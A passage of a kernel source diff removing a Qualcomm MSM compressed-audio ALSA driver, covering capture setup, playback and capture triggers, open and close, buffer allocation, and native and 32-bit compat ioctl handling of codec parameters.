-- * request codec invalid or not supported, -- * use default compress format -- */ -- compr->info.codec_param.codec.id = -- SND_AUDIOCODEC_AMRWB; -- } -- switch (compr->info.codec_param.codec.id) { -- case SND_AUDIOCODEC_AMRWB: -- pr_debug("q6asm_open_read(FORMAT_AMRWB)\n"); -- ret = q6asm_open_read(prtd->audio_client, -- FORMAT_AMRWB); -- if (ret < 0) { -- pr_err("%s: compressed Session out open failed\n", -- __func__); -- return -ENOMEM; -- } -- pr_debug("msm_pcm_routing_reg_phy_stream\n"); -- msm_pcm_routing_reg_phy_stream( -- soc_prtd->dai_link->be_id, -- prtd->audio_client->perf_mode, -- prtd->session_id, substream->stream); -- break; -- default: -- pr_debug("q6asm_open_read_compressed(COMPRESSED_META_DATA_MODE)\n"); -- /* -- ret = q6asm_open_read_compressed(prtd->audio_client, 
-- MAX_NUM_FRAMES_PER_BUFFER,
-- COMPRESSED_META_DATA_MODE);
-- */
-- ret = -EINVAL;
-- break;
-- }
--
-- if (ret < 0) {
-- pr_err("%s: compressed Session out open failed\n",
-- __func__);
-- return -ENOMEM;
-- }
--
-- ret = q6asm_set_io_mode(prtd->audio_client,
-- (COMPRESSED_IO | ASYNC_IO_MODE));
-- if (ret < 0) {
-- pr_err("%s: Set IO mode failed\n", __func__);
-- return -ENOMEM;
-- }
--
-- if (!msm_compr_capture_codecs(codec->id)) {
-- /*
-- * request codec invalid or not supported,
-- * use default compress format
-- */
-- codec->id = SND_AUDIOCODEC_AMRWB;
-- }
-- /* rate and channels are sent to audio driver */
-- prtd->samp_rate = runtime->rate;
-- prtd->channel_mode = runtime->channels;
--
-- if (prtd->enabled)
-- return ret;
-- read_param.len = prtd->pcm_count;
--
-- switch (codec->id) {
-- case SND_AUDIOCODEC_AMRWB:
-- pr_debug("SND_AUDIOCODEC_AMRWB\n");
-- ret = q6asm_enc_cfg_blk_amrwb(prtd->audio_client,
-- MAX_NUM_FRAMES_PER_BUFFER,
-- /*
-- * use fixed band mode and dtx mode
-- * band mode - 23.85 kbps
-- */
-- AMR_WB_BAND_MODE,
-- /* dtx mode - disable */
-- AMR_WB_DTX_MODE);
-- if (ret < 0)
-- pr_err("%s: CMD Format block failed: %d\n",
-- __func__, ret);
-- break;
-- default:
-- pr_debug("No config for codec %d\n", codec->id);
-- }
-- pr_debug("%s: Samp_rate = %d, Channel = %d, pcm_size = %d,\n"
-- "pcm_count = %d, periods = %d\n",
-- __func__, prtd->samp_rate, prtd->channel_mode,
-- prtd->pcm_size, prtd->pcm_count, runtime->periods);
--
-- for (i = 0; i < runtime->periods; i++) {
-- read_param.uid = i;
-- switch (codec->id) {
-- case SND_AUDIOCODEC_AMRWB:
-- read_param.len = prtd->pcm_count
-- - COMPRE_CAPTURE_HEADER_SIZE;
-- read_param.paddr = buf[i].phys
-- + COMPRE_CAPTURE_HEADER_SIZE;
-- pr_debug("Push buffer [%d] to DSP, paddr: %pa, vaddr: %pK\n",
-- i, &read_param.paddr,
-- buf[i].data);
-- q6asm_async_read(prtd->audio_client, &read_param);
-- break;
-- default:
-- read_param.paddr = buf[i].phys;
-- /*q6asm_async_read_compressed(prtd->audio_client,
-- &read_param);*/
-- pr_debug("%s: To add support for read compressed\n",
-- __func__);
-- ret = -EINVAL;
-- break;
-- }
-- }
-- prtd->periods = runtime->periods;
--
-- prtd->enabled = 1;
--
-- return ret;
--}
--
--static int msm_compr_trigger(struct snd_pcm_substream *substream, int cmd)
--{
-- int ret = 0;
-- struct snd_pcm_runtime *runtime = substream->runtime;
-- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
-- struct compr_audio *compr = runtime->private_data;
-- struct msm_audio *prtd = &compr->prtd;
--
-- pr_debug("%s\n", __func__);
-- switch (cmd) {
-- case SNDRV_PCM_TRIGGER_START:
-- prtd->pcm_irq_pos = 0;
--
-- if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) {
-- if (!msm_compr_capture_codecs(
-- compr->info.codec_param.codec.id)) {
-- /*
-- * request codec invalid or not supported,
-- * use default compress format
-- */
-- compr->info.codec_param.codec.id =
-- SND_AUDIOCODEC_AMRWB;
-- }
-- switch (compr->info.codec_param.codec.id) {
-- case SND_AUDIOCODEC_AMRWB:
-- break;
-- default:
-- msm_pcm_routing_reg_psthr_stream(
-- soc_prtd->dai_link->be_id,
-- prtd->session_id, substream->stream);
-- break;
-- }
-- }
-- atomic_set(&prtd->pending_buffer, 1);
-- case SNDRV_PCM_TRIGGER_RESUME:
-- case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
-- pr_debug("%s: Trigger start\n", __func__);
-- q6asm_run_nowait(prtd->audio_client, 0, 0, 0);
-- atomic_set(&prtd->start, 1);
-- break;
-- case SNDRV_PCM_TRIGGER_STOP:
-- pr_debug("SNDRV_PCM_TRIGGER_STOP\n");
-- if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) {
-- switch (compr->info.codec_param.codec.id) {
-- case SND_AUDIOCODEC_AMRWB:
-- break;
-- default:
-- msm_pcm_routing_reg_psthr_stream(
-- soc_prtd->dai_link->be_id,
-- prtd->session_id, substream->stream);
-- break;
-- }
-- }
-- atomic_set(&prtd->start, 0);
-- runtime->render_flag &= ~SNDRV_RENDER_STOPPED;
-- break;
-- case SNDRV_PCM_TRIGGER_SUSPEND:
-- case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
-- pr_debug("SNDRV_PCM_TRIGGER_PAUSE\n");
-- q6asm_cmd_nowait(prtd->audio_client, CMD_PAUSE);
-- atomic_set(&prtd->start, 0);
-- runtime->render_flag &= ~SNDRV_RENDER_STOPPED;
-- break;
-- default:
-- ret = -EINVAL;
-- break;
-- }
--
-- return ret;
--}
--
--static void populate_codec_list(struct compr_audio *compr,
-- struct snd_pcm_runtime *runtime)
--{
-- pr_debug("%s\n", __func__);
-- /* MP3 Block */
-- compr->info.compr_cap.num_codecs = 5;
-- compr->info.compr_cap.min_fragment_size = runtime->hw.period_bytes_min;
-- compr->info.compr_cap.max_fragment_size = runtime->hw.period_bytes_max;
-- compr->info.compr_cap.min_fragments = runtime->hw.periods_min;
-- compr->info.compr_cap.max_fragments = runtime->hw.periods_max;
-- compr->info.compr_cap.codecs[0] = SND_AUDIOCODEC_MP3;
-- compr->info.compr_cap.codecs[1] = SND_AUDIOCODEC_AAC;
-- compr->info.compr_cap.codecs[2] = SND_AUDIOCODEC_AC3;
-- compr->info.compr_cap.codecs[3] = SND_AUDIOCODEC_EAC3;
-- compr->info.compr_cap.codecs[4] = SND_AUDIOCODEC_AMRWB;
-- /* Add new codecs here */
--}
--
--static int msm_compr_open(struct snd_pcm_substream *substream)
--{
-- struct snd_pcm_runtime *runtime = substream->runtime;
-- struct compr_audio *compr;
-- struct msm_audio *prtd;
-- int ret = 0;
--
-- pr_debug("%s\n", __func__);
-- compr = kzalloc(sizeof(struct compr_audio), GFP_KERNEL);
-- if (compr == NULL) {
-- pr_err("Failed to allocate memory for msm_audio\n");
-- return -ENOMEM;
-- }
-- prtd = &compr->prtd;
-- prtd->substream = substream;
-- runtime->render_flag = SNDRV_DMA_MODE;
-- prtd->audio_client = q6asm_audio_client_alloc(
-- (app_cb)compr_event_handler, compr);
-- if (!prtd->audio_client) {
-- pr_info("%s: Could not allocate memory\n", __func__);
-- kfree(prtd);
-- return -ENOMEM;
-- }
--
-- prtd->audio_client->perf_mode = false;
-- pr_info("%s: session ID %d\n", __func__, prtd->audio_client->session);
--
-- prtd->session_id = prtd->audio_client->session;
--
-- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
-- runtime->hw = msm_compr_hardware_playback;
-- prtd->cmd_ack = 1;
-- } else {
-- runtime->hw = msm_compr_hardware_capture;
-- }
--
--
-- ret = snd_pcm_hw_constraint_list(runtime, 0,
-- SNDRV_PCM_HW_PARAM_RATE,
-- &constraints_sample_rates);
-- if (ret < 0)
-- pr_info("snd_pcm_hw_constraint_list failed\n");
-- /* Ensure that buffer size is a multiple of period size */
-- ret = snd_pcm_hw_constraint_integer(runtime,
-- SNDRV_PCM_HW_PARAM_PERIODS);
-- if (ret < 0)
-- pr_info("snd_pcm_hw_constraint_integer failed\n");
--
-- prtd->dsp_cnt = 0;
-- atomic_set(&prtd->pending_buffer, 1);
-- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
-- compr->codec = FORMAT_MP3;
-- populate_codec_list(compr, runtime);
-- runtime->private_data = compr;
-- atomic_set(&prtd->eos, 0);
-- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
-- if (!atomic_cmpxchg(&compressed_audio.audio_ocmem_req, 0, 1))
-- audio_ocmem_process_req(AUDIO, true);
-- else
-- atomic_inc(&compressed_audio.audio_ocmem_req);
-- pr_debug("%s: req: %d\n", __func__,
-- atomic_read(&compressed_audio.audio_ocmem_req));
-- }
-- return 0;
--}
--
--static int compressed_set_volume(struct msm_audio *prtd, uint32_t volume)
--{
-- int rc = 0;
-- int avg_vol = 0;
-- int lgain = (volume >> 16) & 0xFFFF;
-- int rgain = volume & 0xFFFF;
-- if (prtd && prtd->audio_client) {
-- pr_debug("%s: channels %d volume 0x%x\n", __func__,
-- prtd->channel_mode, volume);
-- if ((prtd->channel_mode == 2) &&
-- (lgain != rgain)) {
-- pr_debug("%s: call q6asm_set_lrgain\n", __func__);
-- rc = q6asm_set_lrgain(prtd->audio_client, lgain, rgain);
-- } else {
-- avg_vol = (lgain + rgain)/2;
-- pr_debug("%s: call q6asm_set_volume\n", __func__);
-- rc = q6asm_set_volume(prtd->audio_client, avg_vol);
-- }
-- if (rc < 0) {
-- pr_err("%s: Send Volume command failed rc=%d\n",
-- __func__, rc);
-- }
-- }
-- return rc;
--}
--
--static int msm_compr_playback_close(struct snd_pcm_substream *substream)
--{
-- struct snd_pcm_runtime *runtime = substream->runtime;
-- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
-- struct compr_audio *compr = runtime->private_data;
-- struct msm_audio *prtd = &compr->prtd;
-- int dir = 0;
--
-- pr_debug("%s\n", __func__);
--
-- dir = IN;
-- atomic_set(&prtd->pending_buffer, 0);
--
-- if (atomic_read(&compressed_audio.audio_ocmem_req) > 1)
-- atomic_dec(&compressed_audio.audio_ocmem_req);
-- else if (atomic_cmpxchg(&compressed_audio.audio_ocmem_req, 1, 0))
-- audio_ocmem_process_req(AUDIO, false);
--
-- pr_debug("%s: req: %d\n", __func__,
-- atomic_read(&compressed_audio.audio_ocmem_req));
-- prtd->pcm_irq_pos = 0;
-- q6asm_cmd(prtd->audio_client, CMD_CLOSE);
-- q6asm_audio_client_buf_free_contiguous(dir,
-- prtd->audio_client);
-- msm_pcm_routing_dereg_phy_stream(
-- soc_prtd->dai_link->be_id,
-- SNDRV_PCM_STREAM_PLAYBACK);
-- q6asm_audio_client_free(prtd->audio_client);
-- kfree(prtd);
-- return 0;
--}
--
--static int msm_compr_capture_close(struct snd_pcm_substream *substream)
--{
-- struct snd_pcm_runtime *runtime = substream->runtime;
-- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
-- struct compr_audio *compr = runtime->private_data;
-- struct msm_audio *prtd = &compr->prtd;
-- int dir = OUT;
--
-- pr_debug("%s\n", __func__);
-- atomic_set(&prtd->pending_buffer, 0);
-- q6asm_cmd(prtd->audio_client, CMD_CLOSE);
-- q6asm_audio_client_buf_free_contiguous(dir,
-- prtd->audio_client);
-- msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
-- SNDRV_PCM_STREAM_CAPTURE);
-- q6asm_audio_client_free(prtd->audio_client);
-- kfree(prtd);
-- return 0;
--}
--
--static int msm_compr_close(struct snd_pcm_substream *substream)
--{
-- int ret = 0;
--
-- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
-- ret = msm_compr_playback_close(substream);
-- else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
-- ret = msm_compr_capture_close(substream);
-- return ret;
--}
--
--static int msm_compr_prepare(struct snd_pcm_substream *substream)
--{ -- int ret = 0; -- -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) -- ret = msm_compr_playback_prepare(substream); -- else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) -- ret = msm_compr_capture_prepare(substream); -- return ret; --} -- --static snd_pcm_uframes_t msm_compr_pointer(struct snd_pcm_substream *substream) --{ -- -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- -- if (prtd->pcm_irq_pos >= prtd->pcm_size) -- prtd->pcm_irq_pos = 0; -- -- pr_debug("%s: pcm_irq_pos = %d, pcm_size = %d, sample_bits = %d,\n" -- "frame_bits = %d\n", __func__, prtd->pcm_irq_pos, -- prtd->pcm_size, runtime->sample_bits, -- runtime->frame_bits); -- return bytes_to_frames(runtime, (prtd->pcm_irq_pos)); --} -- --static int msm_compr_mmap(struct snd_pcm_substream *substream, -- struct vm_area_struct *vma) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct msm_audio *prtd = runtime->private_data; -- struct audio_client *ac = prtd->audio_client; -- struct audio_port_data *apd = ac->port; -- struct audio_buffer *ab; -- int dir = -1; -- -- prtd->mmap_flag = 1; -- runtime->render_flag = SNDRV_NON_DMA_MODE; -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) -- dir = IN; -- else -- dir = OUT; -- ab = &(apd[dir].buf[0]); -- -- return msm_audio_ion_mmap(ab, vma); --} -- --static int msm_compr_hw_params(struct snd_pcm_substream *substream, -- struct snd_pcm_hw_params *params) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- struct snd_dma_buffer *dma_buf = &substream->dma_buffer; -- struct audio_buffer *buf; -- int dir, ret; -- -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) -- dir = IN; -- else -- dir = OUT; -- /* Modifying kernel hardware params based on userspace config */ -- if (params_periods(params) > 0 && -- 
(params_periods(params) != runtime->hw.periods_max)) { -- runtime->hw.periods_max = params_periods(params); -- } -- if (params_period_bytes(params) > 0 && -- (params_period_bytes(params) != runtime->hw.period_bytes_min)) { -- runtime->hw.period_bytes_min = params_period_bytes(params); -- } -- runtime->hw.buffer_bytes_max = -- runtime->hw.period_bytes_min * runtime->hw.periods_max; -- pr_debug("allocate %zd buffers each of size %d\n", -- runtime->hw.period_bytes_min, -- runtime->hw.periods_max); -- ret = q6asm_audio_client_buf_alloc_contiguous(dir, -- prtd->audio_client, -- runtime->hw.period_bytes_min, -- runtime->hw.periods_max); -- if (ret < 0) { -- pr_err("Audio Start: Buffer Allocation failed rc = %d\n", -- ret); -- return -ENOMEM; -- } -- buf = prtd->audio_client->port[dir].buf; -- -- dma_buf->dev.type = SNDRV_DMA_TYPE_DEV; -- dma_buf->dev.dev = substream->pcm->card->dev; -- dma_buf->private_data = NULL; -- dma_buf->area = buf[0].data; -- dma_buf->addr = buf[0].phys; -- dma_buf->bytes = runtime->hw.buffer_bytes_max; -- -- pr_debug("%s: buf[%pK]dma_buf->area[%pK]dma_buf->addr[%pa]\n" -- "dma_buf->bytes[%zd]\n", __func__, -- (void *)buf, (void *)dma_buf->area, -- &dma_buf->addr, dma_buf->bytes); -- if (!dma_buf->area) -- return -ENOMEM; -- -- snd_pcm_set_runtime_buffer(substream, &substream->dma_buffer); -- return 0; --} -- --static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream, -- unsigned int cmd, void *arg) --{ -- int rc = 0; -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- uint64_t timestamp; -- uint64_t temp; -- -- switch (cmd) { -- case SNDRV_COMPRESS_TSTAMP: { -- struct snd_compr_tstamp *tstamp; -- pr_debug("SNDRV_COMPRESS_TSTAMP\n"); -- tstamp = arg; -- memset(tstamp, 0x0, sizeof(*tstamp)); -- rc = q6asm_get_session_time(prtd->audio_client, ×tamp); -- if (rc < 0) { -- pr_err("%s: Get Session Time return value =%lld\n", -- __func__, 
timestamp); -- return -EAGAIN; -- } -- temp = (timestamp * 2 * runtime->channels); -- temp = temp * (runtime->rate/1000); -- temp = div_u64(temp, 1000); -- tstamp->sampling_rate = runtime->rate; -- tstamp->timestamp = timestamp; -- pr_debug("%s: bytes_consumed:,timestamp = %lld,\n", -- __func__, -- tstamp->timestamp); -- return 0; -- } -- case SNDRV_COMPRESS_GET_CAPS: { -- struct snd_compr_caps *caps; -- caps = arg; -- memset(caps, 0, sizeof(*caps)); -- pr_debug("SNDRV_COMPRESS_GET_CAPS\n"); -- memcpy(caps, &compr->info.compr_cap, sizeof(*caps)); -- return 0; -- } -- case SNDRV_COMPRESS_SET_PARAMS: -- pr_debug("SNDRV_COMPRESS_SET_PARAMS:\n"); -- memcpy(&compr->info.codec_param, (void *) arg, -- sizeof(struct snd_compr_params)); -- switch (compr->info.codec_param.codec.id) { -- case SND_AUDIOCODEC_MP3: -- /* For MP3 we dont need any other parameter */ -- pr_debug("SND_AUDIOCODEC_MP3\n"); -- compr->codec = FORMAT_MP3; -- break; -- case SND_AUDIOCODEC_AAC: -- pr_debug("SND_AUDIOCODEC_AAC\n"); -- compr->codec = FORMAT_MPEG4_AAC; -- break; -- case SND_AUDIOCODEC_AC3: { -- char params_value[MAX_AC3_PARAM_SIZE]; -- int *params_value_data = (int *)params_value; -- /* 36 is the max param length for ddp */ -- int i; -- struct snd_dec_ddp *ddp = -- &compr->info.codec_param.codec.options.ddp; -- uint32_t params_length = 0; -- memset(params_value, 0, MAX_AC3_PARAM_SIZE); -- /* check integer overflow */ -- if (ddp->params_length > UINT_MAX/sizeof(int)) { -- pr_err("%s: Integer overflow ddp->params_length %d\n", -- __func__, ddp->params_length); -- return -EINVAL; -- } -- params_length = ddp->params_length*sizeof(int); -- if (params_length > MAX_AC3_PARAM_SIZE) { -- /*MAX is 36*sizeof(int) this should not happen*/ -- pr_err("%s: params_length(%d) is greater than %zd\n", -- __func__, params_length, MAX_AC3_PARAM_SIZE); -- return -EINVAL; -- } -- pr_debug("SND_AUDIOCODEC_AC3\n"); -- compr->codec = FORMAT_AC3; -- pr_debug("params_length: %d\n", ddp->params_length); -- for (i = 0; i 
< params_length/sizeof(int); i++) -- pr_debug("params_value[%d]: %x\n", i, -- params_value_data[i]); -- for (i = 0; i < ddp->params_length/2; i++) { -- ddp->params_id[i] = params_value_data[2*i]; -- ddp->params_value[i] = params_value_data[2*i+1]; -- } -- if (atomic_read(&prtd->start)) { -- rc = msm_compr_send_ddp_cfg(prtd->audio_client, -- ddp); -- if (rc < 0) -- pr_err("%s: DDP CMD CFG failed\n", -- __func__); -- } -- break; -- } -- case SND_AUDIOCODEC_EAC3: { -- char params_value[MAX_AC3_PARAM_SIZE]; -- int *params_value_data = (int *)params_value; -- /* 36 is the max param length for ddp */ -- int i; -- struct snd_dec_ddp *ddp = -- &compr->info.codec_param.codec.options.ddp; -- uint32_t params_length = 0; -- memset(params_value, 0, MAX_AC3_PARAM_SIZE); -- /* check integer overflow */ -- if (ddp->params_length > UINT_MAX/sizeof(int)) { -- pr_err("%s: Integer overflow ddp->params_length %d\n", -- __func__, ddp->params_length); -- return -EINVAL; -- } -- params_length = ddp->params_length*sizeof(int); -- if (params_length > MAX_AC3_PARAM_SIZE) { -- /*MAX is 36*sizeof(int) this should not happen*/ -- pr_err("%s: params_length(%d) is greater than %zd\n", -- __func__, params_length, MAX_AC3_PARAM_SIZE); -- return -EINVAL; -- } -- pr_debug("SND_AUDIOCODEC_EAC3\n"); -- compr->codec = FORMAT_EAC3; -- pr_debug("params_length: %d\n", ddp->params_length); -- for (i = 0; i < ddp->params_length; i++) -- pr_debug("params_value[%d]: %x\n", i, -- params_value_data[i]); -- for (i = 0; i < ddp->params_length/2; i++) { -- ddp->params_id[i] = params_value_data[2*i]; -- ddp->params_value[i] = params_value_data[2*i+1]; -- } -- if (atomic_read(&prtd->start)) { -- rc = msm_compr_send_ddp_cfg(prtd->audio_client, -- ddp); -- if (rc < 0) -- pr_err("%s: DDP CMD CFG failed\n", -- __func__); -- } -- break; -- } -- default: -- pr_debug("FORMAT_LINEAR_PCM\n"); -- compr->codec = FORMAT_LINEAR_PCM; -- break; -- } -- return 0; -- case SNDRV_PCM_IOCTL1_RESET: -- 
pr_debug("SNDRV_PCM_IOCTL1_RESET\n"); -- /* Flush only when session is started during CAPTURE, -- while PLAYBACK has no such restriction. */ -- if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK || -- (substream->stream == SNDRV_PCM_STREAM_CAPTURE && -- atomic_read(&prtd->start))) { -- if (atomic_read(&prtd->eos)) { -- prtd->cmd_interrupt = 1; -- wake_up(&the_locks.eos_wait); -- atomic_set(&prtd->eos, 0); -- } -- -- /* A unlikely race condition possible with FLUSH -- DRAIN if ack is set by flush and reset by drain */ -- prtd->cmd_ack = 0; -- rc = q6asm_cmd(prtd->audio_client, CMD_FLUSH); -- if (rc < 0) { -- pr_err("%s: flush cmd failed rc=%d\n", -- __func__, rc); -- return rc; -- } -- rc = wait_event_timeout(the_locks.flush_wait, -- prtd->cmd_ack, 5 * HZ); -- if (!rc) -- pr_err("Flush cmd timeout\n"); -- prtd->pcm_irq_pos = 0; -- } -- break; -- case SNDRV_COMPRESS_DRAIN: -- pr_debug("%s: SNDRV_COMPRESS_DRAIN\n", __func__); -- if (atomic_read(&prtd->pending_buffer)) { -- pr_debug("%s: no pending writes, drain would block\n", -- __func__); -- return -EWOULDBLOCK; -- } -- -- atomic_set(&prtd->eos, 1); -- atomic_set(&prtd->pending_buffer, 0); -- prtd->cmd_ack = 0; -- q6asm_cmd_nowait(prtd->audio_client, CMD_EOS); -- /* Wait indefinitely for DRAIN. 
Flush can also signal this*/ -- rc = wait_event_interruptible(the_locks.eos_wait, -- (prtd->cmd_ack || prtd->cmd_interrupt)); -- -- if (rc < 0) -- pr_err("EOS cmd interrupted\n"); -- pr_debug("%s: SNDRV_COMPRESS_DRAIN out of wait\n", __func__); -- -- if (prtd->cmd_interrupt) -- rc = -EINTR; -- -- prtd->cmd_interrupt = 0; -- return rc; -- default: -- break; -- } -- return snd_pcm_lib_ioctl(substream, cmd, arg); --} --#ifdef CONFIG_COMPAT --struct snd_enc_wma32 { -- u32 super_block_align; /* WMA Type-specific data */ -- u32 encodeopt1; -- u32 encodeopt2; --}; -- --struct snd_enc_vorbis32 { -- s32 quality; -- u32 managed; -- u32 max_bit_rate; -- u32 min_bit_rate; -- u32 downmix; --}; -- --struct snd_enc_real32 { -- u32 quant_bits; -- u32 start_region; -- u32 num_regions; --}; -- --struct snd_enc_flac32 { -- u32 num; -- u32 gain; --}; -- --struct snd_enc_generic32 { -- u32 bw; /* encoder bandwidth */ -- s32 reserved[15]; --}; --struct snd_dec_ddp32 { -- u32 params_length; -- u32 params_id[18]; -- u32 params_value[18]; --}; -- --union snd_codec_options32 { -- struct snd_enc_wma32 wma; -- struct snd_enc_vorbis32 vorbis; -- struct snd_enc_real32 real; -- struct snd_enc_flac32 flac; -- struct snd_enc_generic32 generic; -- struct snd_dec_ddp32 ddp; --}; -- --struct snd_codec32 { -- u32 id; -- u32 ch_in; -- u32 ch_out; -- u32 sample_rate; -- u32 bit_rate; -- u32 rate_control; -- u32 profile; -- u32 level; -- u32 ch_mode; -- u32 format; -- u32 align; -- union snd_codec_options32 options; -- u32 reserved[3]; --}; -- --struct snd_compressed_buffer32 { -- u32 fragment_size; -- u32 fragments; --}; -- --struct snd_compr_params32 { -- struct snd_compressed_buffer32 buffer; -- struct snd_codec32 codec; -- u8 no_wake_mode; --}; -- --struct snd_compr_caps32 { -- u32 num_codecs; -- u32 direction; -- u32 min_fragment_size; -- u32 max_fragment_size; -- u32 min_fragments; -- u32 max_fragments; -- u32 codecs[MAX_NUM_CODECS]; -- u32 reserved[11]; --}; --struct snd_compr_tstamp32 { -- u32 
byte_offset; -- u32 copied_total; -- compat_ulong_t pcm_frames; -- compat_ulong_t pcm_io_frames; -- u32 sampling_rate; -- compat_u64 timestamp; --}; --enum { -- SNDRV_COMPRESS_TSTAMP32 = _IOR('C', 0x20, struct snd_compr_tstamp32), -- SNDRV_COMPRESS_GET_CAPS32 = _IOWR('C', 0x10, struct snd_compr_caps32), -- SNDRV_COMPRESS_SET_PARAMS32 = -- _IOW('C', 0x12, struct snd_compr_params32), --}; --static int msm_compr_compat_ioctl(struct snd_pcm_substream *substream, -- unsigned int cmd, void *arg) --{ -- int err = 0; -- switch (cmd) { -- case SNDRV_COMPRESS_TSTAMP32: { -- struct snd_compr_tstamp tstamp; -- struct snd_compr_tstamp32 tstamp32; -- memset(&tstamp, 0, sizeof(tstamp)); -- memset(&tstamp32, 0, sizeof(tstamp32)); -- cmd = SNDRV_COMPRESS_TSTAMP; -- err = msm_compr_ioctl_shared(substream, cmd, &tstamp); -- if (err) { -- pr_err("%s: COMPRESS_TSTAMP failed rc %d\n", -- __func__, err); -- goto bail_out; -- } -- tstamp32.byte_offset = tstamp.byte_offset; -- tstamp32.copied_total = tstamp.copied_total; -- tstamp32.pcm_frames = tstamp.pcm_frames; -- tstamp32.pcm_io_frames = tstamp.pcm_io_frames; -- tstamp32.sampling_rate = tstamp.sampling_rate; -- tstamp32.timestamp = tstamp.timestamp; -- if (copy_to_user(arg, &tstamp32, sizeof(tstamp32))) { -- pr_err("%s: copytouser failed COMPRESS_TSTAMP32\n", -- __func__); -- err = -EFAULT; -- } -- break; -- } -- case SNDRV_COMPRESS_GET_CAPS32: { -- struct snd_compr_caps caps; -- struct snd_compr_caps32 caps32; -- u32 i; -- memset(&caps, 0, sizeof(caps)); -- memset(&caps32, 0, sizeof(caps32)); -- cmd = SNDRV_COMPRESS_GET_CAPS; -- err = msm_compr_ioctl_shared(substream, cmd, &caps); -- if (err) { -- pr_err("%s: GET_CAPS failed rc %d\n", -- __func__, err); -- goto bail_out; -- } -- pr_debug("SNDRV_COMPRESS_GET_CAPS_32\n"); -- if (!err && caps.num_codecs >= MAX_NUM_CODECS) { -- pr_err("%s: Invalid number of codecs\n", __func__); -- err = -EINVAL; -- goto bail_out; -- } -- caps32.direction = caps.direction; -- caps32.max_fragment_size = 
caps.max_fragment_size; -- caps32.max_fragments = caps.max_fragments; -- caps32.min_fragment_size = caps.min_fragment_size; -- caps32.num_codecs = caps.num_codecs; -- for (i = 0; i < caps.num_codecs; i++) -- caps32.codecs[i] = caps.codecs[i]; -- if (copy_to_user(arg, &caps32, sizeof(caps32))) { -- pr_err("%s: copytouser failed COMPRESS_GETCAPS32\n", -- __func__); -- err = -EFAULT; -- } -- break; -- } -- case SNDRV_COMPRESS_SET_PARAMS32: { -- struct snd_compr_params32 params32; -- struct snd_compr_params params; -- memset(¶ms32, 0 , sizeof(params32)); -- memset(¶ms, 0 , sizeof(params)); -- cmd = SNDRV_COMPRESS_SET_PARAMS; -- if (copy_from_user(¶ms32, arg, sizeof(params32))) { -- pr_err("%s: copyfromuser failed SET_PARAMS32\n", -- __func__); -- err = -EFAULT; -- goto bail_out; -- } -- params.no_wake_mode = params32.no_wake_mode; -- params.codec.id = params32.codec.id; -- params.codec.ch_in = params32.codec.ch_in; -- params.codec.ch_out = params32.codec.ch_out; -- params.codec.sample_rate = params32.codec.sample_rate; -- params.codec.bit_rate = params32.codec.bit_rate; -- params.codec.rate_control = params32.codec.rate_control; -- params.codec.profile = params32.codec.profile; -- params.codec.level = params32.codec.level; -- params.codec.ch_mode = params32.codec.ch_mode; -- params.codec.format = params32.codec.format; -- params.codec.align = params32.codec.align; -- -- switch (params.codec.id) { -- case SND_AUDIOCODEC_WMA: -- case SND_AUDIOCODEC_WMA_PRO: -- params.codec.options.wma.encodeopt1 = -- params32.codec.options.wma.encodeopt1; -- params.codec.options.wma.encodeopt2 = -- params32.codec.options.wma.encodeopt2; -- params.codec.options.wma.super_block_align = -- params32.codec.options.wma.super_block_align; -- break; -- case SND_AUDIOCODEC_VORBIS: -- params.codec.options.vorbis.downmix = -- params32.codec.options.vorbis.downmix; -- params.codec.options.vorbis.managed = -- params32.codec.options.vorbis.managed; -- params.codec.options.vorbis.max_bit_rate = -- 
params32.codec.options.vorbis.max_bit_rate; -- params.codec.options.vorbis.min_bit_rate = -- params32.codec.options.vorbis.min_bit_rate; -- params.codec.options.vorbis.quality = -- params32.codec.options.vorbis.quality; -- break; -- case SND_AUDIOCODEC_REAL: -- params.codec.options.real.num_regions = -- params32.codec.options.real.num_regions; -- params.codec.options.real.quant_bits = -- params32.codec.options.real.quant_bits; -- params.codec.options.real.start_region = -- params32.codec.options.real.start_region; -- break; -- case SND_AUDIOCODEC_FLAC: -- params.codec.options.flac.gain = -- params32.codec.options.flac.gain; -- params.codec.options.flac.num = -- params32.codec.options.flac.num; -- break; -- case SND_AUDIOCODEC_DTS: -- case SND_AUDIOCODEC_DTS_PASS_THROUGH: -- case SND_AUDIOCODEC_DTS_LBR: -- case SND_AUDIOCODEC_DTS_LBR_PASS_THROUGH: -- case SND_AUDIOCODEC_DTS_TRANSCODE_LOOPBACK: -- break; -- case SND_AUDIOCODEC_AC3: -- case SND_AUDIOCODEC_EAC3: -- params.codec.options.ddp.params_length = -- params32.codec.options.ddp.params_length; -- memcpy(params.codec.options.ddp.params_value, -- params32.codec.options.ddp.params_value, -- sizeof(params32.codec.options.ddp.params_value)); -- memcpy(params.codec.options.ddp.params_id, -- params32.codec.options.ddp.params_id, -- sizeof(params32.codec.options.ddp.params_id)); -- break; -- default: -- params.codec.options.generic.bw = -- params32.codec.options.generic.bw; -- break; -- } -- if (!err) -- err = msm_compr_ioctl_shared(substream, cmd, ¶ms); -- break; -- } -- default: -- err = msm_compr_ioctl_shared(substream, cmd, 